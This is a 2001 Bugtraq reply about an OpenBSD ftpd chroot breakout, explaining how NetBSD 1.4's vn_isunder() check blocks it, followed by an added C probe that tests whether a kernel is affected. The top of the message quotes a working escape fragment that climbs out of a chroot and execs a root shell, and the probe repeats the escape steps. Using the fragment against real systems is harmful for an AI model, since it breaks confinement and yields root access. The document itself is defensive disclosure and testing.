[20303] in bugtraq
Re: OpenBSD 2.8 ftpd/glob exploit (breaks chroot)
daemon@ATHENA.MIT.EDU (Bill Sommerfeld)
Wed Apr 18 15:39:05 2001
Message-ID: <200104181401.f3IE1tP03684@syn.hamachi.org>
Date: Wed, 18 Apr 2001 10:01:51 -0400
Reply-To: sommerfeld@orchard.arlington.ma.us
From: Bill Sommerfeld <sommerfeld@orchard.arlington.ma.us>
X-To: Tomas Kindahl <stok@CODEFACTORY.SE>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Message from Tomas Kindahl <stok@CODEFACTORY.SE> of "Mon, 16 Apr 2001 15:50:50 +0200." <20010416155050.A2147@codefactory.se>
    /* exploit fragment quoted from the report being replied to; needs <unistd.h>, <fcntl.h>, <sys/stat.h> */
    int a, cnt; char *av[] = { "sh", NULL };
    seteuid(0); a = open("..", O_RDONLY); mkdir("adfa", 0555);
    chroot("adfa"); fchdir(a);
    for (cnt = 100; cnt; cnt--)
        chdir("..");
    chroot(".."); execve("/bin//sh", av, NULL);
For the record, I blocked this way of breaking out of chroot in NetBSD
in 1999; the fix is present in NetBSD 1.4 and later releases. I'm
surprised that this hasn't been picked up by more distributions.
The sys___getcwd() syscall I added for Linux compatibility involved
the extension of the namei cache to track '..' entries; this allows
for efficient implementation of a "vn_isunder()" test, which is used
in several system calls, including chroot(), fchroot(), and fchdir(),
to prevent moving a process's root directory upward, and to prevent a
process's working directory from ever being above its root directory.
When the above code is executed on NetBSD 1.4 or later, the
chroot() will implicitly chdir() the process to the new root directory
(since it starts off outside), and the "fchdir()" will fail with an
EINVAL, leaving the process stuck inside the chroot.
- Bill
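The following probe is an added example, not part of Bill Sommerfeld's message or of the NetBSD or OpenBSD sources. It runs the escape sequence from the report (open("..") before chroot(), then fchdir() to the saved descriptor and climb with chdir("..")) in a forked child and classifies what the kernel did, so a practitioner can check whether a given system behaves like NetBSD 1.4+ (fchdir() refused, process stays inside) or like the affected ftpd host (working directory climbs back to the real root). Instead of exec'ing a shell it compares the device and inode of "." after the climb against the real "/" recorded before the chroot(). The scratch directory names, the result codes and the function names are choices made for this example; the check itself needs euid 0 (or CAP_SYS_CHROOT on Linux) and otherwise reports PROBE_NEED_ROOT without attempting a chroot().

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Outcome codes returned by probe_chroot_escape(). */
enum probe_result {
    PROBE_ESCAPED   = 0, /* cwd climbed back to the real root: kernel is affected */
    PROBE_BLOCKED   = 1, /* fchdir()/chdir("..") could not leave the new root */
    PROBE_NEED_ROOT = 2, /* no euid 0 / CAP_SYS_CHROOT, so chroot() was never tried */
    PROBE_ERROR     = 3  /* harness failure (mkdtemp, fork, wait) */
};

/*
 * Executes the escape sequence from the report inside a child process and
 * _exit()s with a probe_result.  chroot() is irreversible for the calling
 * process, which is why the parent never does it itself.  "adfa" and the
 * /tmp template are illustrative names chosen for this example.
 */
static void run_escape_in_child(const char *workdir) {
    struct stat real_root, here;
    int a;

    if (chdir(workdir) == -1)
        _exit(PROBE_ERROR);
    /* Remember the real "/" so it can be recognised after the climb. */
    if (stat("/", &real_root) == -1)
        _exit(PROBE_ERROR);
    /* As in ftpd: regain euid 0 if a saved root uid exists. */
    (void)seteuid(0);
    if (geteuid() != 0)
        _exit(PROBE_NEED_ROOT);

    /* Step 1: keep a descriptor for a directory that will be above the new root. */
    a = open("..", O_RDONLY);
    if (a == -1)
        _exit(PROBE_ERROR);
    if (mkdir("adfa", 0755) == -1 && errno != EEXIST)
        _exit(PROBE_ERROR);
    if (chroot("adfa") == -1)
        _exit(errno == EPERM ? PROBE_NEED_ROOT : PROBE_ERROR);

    /* Step 2: on NetBSD 1.4+ this is where the vn_isunder() test says EINVAL. */
    if (fchdir(a) == -1)
        _exit(PROBE_BLOCKED);
    /* Step 3: climb; a kernel that tracks '..' stops this at the new root. */
    for (int cnt = 100; cnt; cnt--)
        (void)chdir("..");

    if (stat(".", &here) == -1)
        _exit(PROBE_ERROR);
    _exit(here.st_dev == real_root.st_dev && here.st_ino == real_root.st_ino
              ? PROBE_ESCAPED : PROBE_BLOCKED);
}

/* Creates a scratch directory, runs the probe in a child, cleans up, returns a probe_result. */
int probe_chroot_escape(void) {
    char workdir[] = "/tmp/chrootprobe.XXXXXX";   /* constructed scratch location */
    char inner[sizeof workdir + sizeof "/adfa"];
    int status, result = PROBE_ERROR;
    pid_t pid;

    if (mkdtemp(workdir) == NULL)
        return PROBE_ERROR;
    pid = fork();
    if (pid == 0)
        run_escape_in_child(workdir);      /* never returns */
    if (pid > 0 && waitpid(pid, &status, 0) == pid && WIFEXITED(status))
        result = WEXITSTATUS(status);

    snprintf(inner, sizeof inner, "%s/adfa", workdir);
    (void)rmdir(inner);
    (void)rmdir(workdir);
    return result;
}

int main(void) {
    static const char *names[] = { "ESCAPED", "BLOCKED", "NEED_ROOT", "ERROR" };
    int r = probe_chroot_escape();
    printf("chroot escape probe: %s\n", names[r]);
    return r;
}
```

Run it as root on the system under test: PROBE_ESCAPED means the saved descriptor let the working directory climb above the new root, the behaviour the report describes; PROBE_BLOCKED is what the message says NetBSD 1.4 and later produce. Because the child, not the parent, performs the chroot(), the probe can be run repeatedly from one shell without the caller ending up stuck inside the scratch directory.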